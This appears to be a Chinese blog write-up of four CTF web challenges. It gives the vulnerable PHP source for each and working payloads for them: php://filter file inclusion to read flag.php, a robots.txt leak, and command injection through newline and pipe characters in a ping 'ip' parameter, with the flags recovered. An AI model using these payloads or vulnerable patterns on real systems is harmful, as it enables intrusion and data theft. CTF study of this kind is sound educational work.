朋友打比赛，向她（对，女字旁的她）要的web题地址。

WEB-01

访问，有一张图片。

查看源代码，发现提示有flag.php。访问后为空白页面。

1	<img src="1.jpg" alt="ͼƬ" /><!-- flag.php -->

用御剑可以扫出备份文件index.php~，得到源代码如下：

<?php
 $a=$_GET["file"];
 if(!isset($a))
 {
	 $a='config';
 }
 @include($a.'.php');
echo '<img src="'.$img.'" alt="ͼƬ" />';
?>

参数为file，尝试利用php伪协议去读取flag.php。最后payload：

1	http://XXXXX/index.php?file=php://filter/read=convert.base64-encode/resource=flag

得到

1	PD9waHANCiRmbGFnPSdmbGFnezM4Y2FjMGU0OTc0ZTBlOTc2MTQ5MDhmOTAxZTQ1ZmUzfSc7DQo/Pg==

base64-decode得到最后flag:

1
2
3

<?php
$flag='flag{38cac0e4974e0e97614908f901e45fe3}';
?>

WEB-02

上御剑扫描。发现敏感文件robots.txt。

User-agent: *
Disallow:
Disallow: /images
Disallow: /js
Disallow: /css

在js目录下有flag.txt 访问：

1	flag{89a7f0eb82a314e5745ec9bc556d06c5}

WEB-03

题目给了源码

<?php
if(isset($_REQUEST[ 'ip' ])) {
    $target = trim($_REQUEST[ 'ip' ]);
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '|' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    $cmd = shell_exec( 'ping  -c 4 ' . $target );
        echo $target;
    echo  "<pre>{$cmd}</pre>";
}
show_source(__FILE__);

拿DVWA代码改的，简直无力吐槽。

payload1：

1	http://XXXX:83/index.php?ip=127.0.0.1%0als

paylaod2:

1	http://XXXX:83/index.php?ip=127.0.0.1%0acat flag.php

WEB-04

题目给了源码：

<?php
if( isset( $_REQUEST['ip']) ) {
   $target = $_REQUEST[ 'ip' ];
   $cmd = shell_exec( 'ping  -c 4 ' . $target );
   echo  "<pre>{$cmd}</pre>";
}
show_source(__FILE__);
?>

没任何过滤，payload1：

1	http://XXXX:84/index.php?ip=127.0.0.2 \| ls

payload2：

1	http://XXXX:84/index.php?ip=127.0.0.1 \| cat flag.php

flag:

1	flag{19b55155-f84c-47ef-aeaa-038116de31e5}

小扯两句

好吧，这web题的质量，不敢恭维。